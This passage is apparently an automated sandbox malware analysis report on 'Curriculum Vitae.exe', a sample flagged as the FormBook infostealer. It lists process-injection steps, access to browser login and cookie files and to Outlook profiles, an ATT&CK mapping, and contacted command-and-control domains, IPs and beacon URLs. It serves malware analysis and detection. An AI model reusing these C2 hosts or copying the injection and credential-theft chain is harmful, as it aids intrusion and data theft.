            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\regsvr32.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: NULL target: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: NULL target: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 5324Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\regsvr32.exeThread APC queued: target process: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 39D008Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D91201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00D91201
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D72BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00D72BA5
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9B226 SendInput,keybd_event,0_2_00D9B226
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DB22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00DB22DA
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Curriculum Vitae.exe"Jump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D90B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00D90B62
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D91663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00D91663
            Source: Curriculum Vitae.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: OAIexgManRWDie.exe, 00000005.00000000.2579654272.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3270100790.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270497993.0000000001591000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: Curriculum Vitae.exe, OAIexgManRWDie.exe, 00000005.00000000.2579654272.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3270100790.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270497993.0000000001591000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: OAIexgManRWDie.exe, 00000005.00000000.2579654272.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3270100790.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270497993.0000000001591000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: OAIexgManRWDie.exe, 00000005.00000000.2579654272.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3270100790.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270497993.0000000001591000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D50698 cpuid 0_2_00D50698
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00DA8195
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D8D27A GetUserNameW,0_2_00D8D27A
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D6B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00D6B952
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D342DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Curriculum Vitae.exeBinary or memory string: WIN_81
            Source: Curriculum Vitae.exeBinary or memory string: WIN_XP
            Source: Curriculum Vitae.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Curriculum Vitae.exeBinary or memory string: WIN_XPe
            Source: Curriculum Vitae.exeBinary or memory string: WIN_VISTA
            Source: Curriculum Vitae.exeBinary or memory string: WIN_7
            Source: Curriculum Vitae.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DB1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00DB1204
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DB1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00DB1806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501087 Sample: Curriculum Vitae.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 28 www.mediaplug.biz 2->28 30 www.marcoiozia.info 2->30 32 5 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 6 other signatures 2->48 10 Curriculum Vitae.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 OAIexgManRWDie.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 regsvr32.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 OAIexgManRWDie.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 marcoiozia.info 195.110.124.133, 55085, 55086, 55087 REGISTER-ASIT Italy 22->34 36 godoggyonbase.online 84.32.84.32, 55089, 55090, 55091 NTT-LT-ASLT Lithuania 22->36 38 2 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Curriculum Vitae.exe66%ReversingLabsWin32.Worm.DorkBot
            Curriculum Vitae.exe60%VirustotalBrowse
            Curriculum Vitae.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.chinaen.org0%VirustotalBrowse
            www.mediaplug.biz0%VirustotalBrowse
            171.39.242.20.in-addr.arpa0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.40%Avira URL Cloudsafe
            http://www.chinaen.org/lol/198.html0%Avira URL Cloudsafe
            http://www.marcoiozia.info/6u21/?QpGDsvFp=aL/4TjGztHWcUB/Ah5XMbJsPVjcLX5spIqygDBReB+gjFi+JNHxT0K0F5MtDhvjmRAZ0VF/vQduwy3cjjhNQXD5C3/i7fPsqWYlJ4opKyF5MG7GdSMwyyOQYqJ9RHJTdWA==&en=KRMtj8Zx1f-0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/195.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://www.chinaen.org/lol/198.html0%VirustotalBrowse
            http://www.chinaen.org/lol/202.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.40%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.40%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js0%VirustotalBrowse
            http://www.chinaen.org/lol/202.html0%VirustotalBrowse
            http://www.chinaen.org/lol/0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/197.html0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/203.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.40%VirustotalBrowse
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/197.html0%VirustotalBrowse
            http://www.chinaen.org/lol/195.html0%VirustotalBrowse
            http://www.godoggyonbase.online/2b9b/?QpGDsvFp=ZHAZUszVkZojOh6l4QgRWsOseo6gnr5+/9v7uoYYl6Pb3zYSipzXXNStKfhRGhUQf6Tergy2VCT+UWp4uEi/6TdO8TzwggtBmSoW3KZOjFFDDhjE/y85QqgGs38SMRVr8g==&en=KRMtj8Zx1f-0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css0%VirustotalBrowse
            http://www.chinaen.org/lol/200.html0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png0%Avira URL Cloudsafe
            http://www.chinaen.org/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/login.php0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css0%VirustotalBrowse
            http://www.chinaen.org/lol/203.html0%VirustotalBrowse
            https://www.zblogcn.com/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.40%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png0%VirustotalBrowse
            http://www.chinaen.org/lol/201.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/login.php0%VirustotalBrowse
            http://www.chinaen.org/lol/0%VirustotalBrowse
            https://www.zblogcn.com/1%VirustotalBrowse
            https://www.htmlit.com.cn/0%Avira URL Cloudsafe
            http://www.chinaen.org/0%VirustotalBrowse
            http://www.marcoiozia.info/6u21/0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/201.html0%VirustotalBrowse
            http://www.chinaen.org/lol/200.html0%VirustotalBrowse
            http://www.chinaen.org/lol/204.html0%Avira URL Cloudsafe
            http://www.chinaen.org/search.php?act=search0%Avira URL Cloudsafe
            http://www.mediaplug.biz/13ne/0%Avira URL Cloudsafe
            http://www.mediaplug.biz0%Avira URL Cloudsafe
            https://www.htmlit.com.cn/0%VirustotalBrowse
            http://www.mediaplug.biz0%VirustotalBrowse
            http://www.godoggyonbase.online/2b9b/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css0%Avira URL Cloudsafe
            http://www.marcoiozia.info/6u21/1%VirustotalBrowse
            http://www.chinaen.org/zb_system/script/c_html_js_add.php0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/199.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.40%VirustotalBrowse
            http://www.mediaplug.biz/13ne/1%VirustotalBrowse
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css0%VirustotalBrowse
            http://www.chinaen.org/search.php?act=search0%VirustotalBrowse
            http://www.chinaen.org/zt7d/?QpGDsvFp=KcI7zOUatYggDJ3AV9ydt+9IOITQmx5DA5xygALe8uDfsJvPSx2pTS8MbER0fEeW+0g1hrhWUIgkLG8bo3rrAlPfGKh0dC1LPhQcHC1DvDFG/ug/vgNVnHXaPgixFLXzAw==&en=KRMtj8Zx1f-0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/script/c_html_js_add.php0%VirustotalBrowse
            http://www.chinaen.org/lol/196.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/script/zblogphp.js0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/204.html0%VirustotalBrowse
            http://www.godoggyonbase.online/2b9b/1%VirustotalBrowse
            http://www.chinaen.org/lol/199.html0%VirustotalBrowse
            http://www.chinaen.org/lol/196.html0%VirustotalBrowse
            http://www.chinaen.org/zb_system/script/zblogphp.js0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.chinaen.org
            		188.114.96.3
            		truetrueunknown
            marcoiozia.info
            		195.110.124.133
            		truetrue
              		unknown
              godoggyonbase.online
              		84.32.84.32
              		truetrue
                		unknown
                www.mediaplug.biz
                		66.81.203.200
                		truetrueunknown
                www.marcoiozia.info
                		unknown
                		unknowntrue
                  		unknown
                  www.godoggyonbase.online
                  		unknown
                  		unknowntrue
                    		unknown
                    171.39.242.20.in-addr.arpa
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.marcoiozia.info/6u21/?QpGDsvFp=aL/4TjGztHWcUB/Ah5XMbJsPVjcLX5spIqygDBReB+gjFi+JNHxT0K0F5MtDhvjmRAZ0VF/vQduwy3cjjhNQXD5C3/i7fPsqWYlJ4opKyF5MG7GdSMwyyOQYqJ9RHJTdWA==&en=KRMtj8Zx1f-true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.godoggyonbase.online/2b9b/?QpGDsvFp=ZHAZUszVkZojOh6l4QgRWsOseo6gnr5+/9v7uoYYl6Pb3zYSipzXXNStKfhRGhUQf6Tergy2VCT+UWp4uEi/6TdO8TzwggtBmSoW3KZOjFFDDhjE/y85QqgGs38SMRVr8g==&en=KRMtj8Zx1f-true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.marcoiozia.info/6u21/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mediaplug.biz/13ne/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.godoggyonbase.online/2b9b/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zt7d/?QpGDsvFp=KcI7zOUatYggDJ3AV9ydt+9IOITQmx5DA5xygALe8uDfsJvPSx2pTS8MbER0fEeW+0g1hrhWUIgkLG8bo3rrAlPfGKh0dC1LPhQcHC1DvDFG/ug/vgNVnHXaPgixFLXzAw==&en=KRMtj8Zx1f-true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.cssregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabregsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/lol/198.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/lol/195.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
